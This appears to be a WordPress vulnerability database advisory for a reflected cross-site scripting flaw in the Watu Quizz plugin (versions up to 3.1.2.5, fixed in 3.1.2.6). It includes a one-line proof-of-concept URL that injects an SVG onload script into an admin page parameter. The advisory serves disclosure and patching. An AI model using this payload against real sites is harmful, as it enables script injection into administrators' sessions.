Watu Quizz <= 3.1.2.5 - Reflected XSS via question-form.html.php



Proof of Concept
/wp-admin/admin.php?page=watu_question&question=1&action=edit&quiz=1"><svg/onload=alert(/XSS/)>

Affects Plugin

fixed in version 3.1.2.6

References

URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2114019%40watu&old=2112579%40watu&

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 2828
Verified No
WPVDB ID 9409

Timeline

Publicly Published 2019-06-28 (4 months ago)
Added 2019-06-28 (4 months ago)
Last Updated 2019-06-28 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin